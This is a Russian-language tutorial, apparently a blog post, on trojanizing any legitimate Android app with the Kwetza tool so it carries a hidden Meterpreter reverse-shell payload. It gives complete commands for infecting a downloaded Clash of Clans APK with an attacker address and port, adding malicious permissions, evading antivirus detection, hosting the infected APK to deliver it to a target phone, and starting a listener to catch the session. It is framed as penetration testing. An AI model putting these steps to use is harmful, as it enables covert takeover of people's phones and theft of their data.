Заражение законных приложений Android — это отличный способ увидеть, как устройства, пользователи и антивирус реагируют на эти типы атак, и служит постоянным напоминанием о том, насколько мобильное пространство соблазнительно для злоумышленников.

Заражение Android-приложений — отличный способ увидеть, как вредоносные действия в дикой природе, такие как вредоносное ПО и розыгрыши, влияют на людей. Это не только дает вам доступ к компьютерам пользователей, но также позволяет вам наблюдать, как устройства, пользователи и антивирусное программное обеспечение реагируют на эти обстоятельства.

В этой статье мы покажем вам, как заразить (или создать троян) любое Android-приложение с помощью инструмента Kwetza.

Kwetza — это инструмент, который позволяет вам заразить текущее Android-приложение полезной нагрузкой Meterpreter. Kwetza заражает существующее Android-приложение пользовательскими или стандартными форматами полезной нагрузки, чтобы сохранить стратегическую дистанцию ​​от обнаружения антивирусом. Kwetza позволяет вам заражать приложения Android, используя авторизацию целевого приложения по умолчанию, или вводить дополнительные согласия для повышения дополнительной полезности.

Чтобы загрузить этот инструмент, посетите следующую веб-страницу: https://github.com/sensepost/kwetza.

Скопируйте ссылку для загрузки и используйте команду «git clone», чтобы загрузить kwetza в каталог «/opt».

Пример: (root@kali:/opt# git clone https://github.com/sensepost/kwetza.git).

Затем перейдите на веб-страницу «https://apkpure.com/» и загрузите любое приложение, которое хотите заразить бэкдором.

Затем переместите это приложение в каталог /kwetza.

Пример: (root@kali:~/Downloads# mv Clash-of-Clans.apk /opt/kwetza/).

Kwetza написан на Python и требует "BeautifulSoup4", который можно установить с помощью команды "pip".

Пример: (root@kali:/opt/kwetza# pip install beautifulsoup4).

Использование этого инструмента выглядит следующим образом:

«python kwetza.py [apk].apk https/tcp LHOST LPORT yes/no customClass»

[apk]= имя APK-файла, который вы хотите заразить.

https/tcp = выберите соединение HTTPS или TCP (HTTPS рекомендуется для стабильного соединения)

LHOST = IP-адрес вашего слушателя (IP-адрес злоумышленника).

LPORT = порт вашего прослушивателя.

yes = включите "yes", чтобы внедрить в приложение новые вредоносные разрешения, "no", чтобы использовать разрешения приложения по умолчанию.

customClass = Укажите здесь пользовательское действие, если вы хотите, чтобы Kwetza внедрил в это действие.

Пример: (root@kali:/opt/kwetza# python kwetza.py Clash-of-Clans.apk 10.10.10.4 8080 no).

Если вы хотите подписать зараженное приложение с помощью собственной аутентификации, создайте другое хранилище ключей в папке “payload” и переименуйте его в текущее хранилище ключей или измените ссылку в “kwetza.py”. .” Пароль для хранилища ключей по умолчанию: “password”. Введите парольную фразу и нажмите “Enter”, чтобы начать процесс.

Когда все будет сделано и завершено, зараженный APK-файл будет сохранен в папке /opt/kwetza/Clash-of-Clans/dist/Clash-of-Clans.apk. Переместите зараженное приложение на веб-сервер для бесперебойной доставки на наш целевой телефон.

Пример: (root@kali:/opt/kwetza/Clash-of-Clans/dist# mv Clash-of-Clans.apk /var/www/ html/Hello_World/).

Перед выполнением нашего вредоносного APK-файла на целевом устройстве Android нам нужно запустить прослушиватель. В этом примере в качестве эксплойта мы будем использовать мультиобработчик и для полезной нагрузки «android/meterpreter/reverse_tcp». Установите «LHOST» и "LPORT", затем введите "exploit", чтобы начать прослушивание входящих подключений.

После того, как вредоносный APK-файл загружен и установлен, он запустит все законные пакеты приложений, но в фоновом режиме устройство отправит обратное соединение оболочки на компьютер злоумышленника.

Как вы можете видеть на изображении ниже, нам удалось получить активную сессию, поэтому мы можем взаимодействовать с ней и использовать ее дальше.

Примечание. Если вы столкнулись с ошибкой "Панель запуска не найдена", воспользуйтесь следующим методом устранения неполадок.

Откройте скрипт kwetza.py с помощью любого инструмента для редактирования файлов и найдите раздел, указанный ниже:

— — — — — — — — — — — — — — — — — — — — — — — — — —

«#ТЕПЕРЬ НАМ НУЖНО ДЕКОМПИЛИРОВАТЬ ПРИЛОЖЕНИЕ
command = [“apktool”, “d”, “-f”, “-r”, ““+cwd+”/ "+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]"

— — — — — — — — — — — — — — — — — — — — — — — — — —

И удалите параметры option “-f”и “-r”, как показано на снимке экрана.

Затем удалите папку, созданную для зараженного приложения. В данном случае мы использовали Clash-of-Clans.apk, поэтому kwetza создал папку Clash_of_Clans. Нам нужно удалить эту папку, чтобы не было ошибок при повторном запуске kwetza.

Пример: (root@kali:/opt/kwetza# rm -rf Clash_of_Clans).

Наконец, запустите kwetza с помощью тех же команд, но в конце добавьте параметр AssistActivity.

Пример: (root@kali:/opt/kwetza# python kwetza.py Clash-of-Clans.apk 10.10.10.4 8080 без AssistActivity).

Kwetza — это инструмент для тестирования на проникновение и оценки безопасности. Он заражает существующее Android-приложение одним из двух шаблонов полезной нагрузки: пользовательским или стандартным. Это делается для предотвращения обнаружения антивирусным программным обеспечением. Для достижения дополнительных функций инструмент использует разрешения целевого приложения по умолчанию или вводит дополнительные разрешения.

Заражение законных приложений Android — это отличный способ увидеть, как устройства, пользователи и антивирус реагируют на эти типы атак, и служит постоянным напоминанием о том, насколько мобильное пространство соблазнительно для злоумышленников.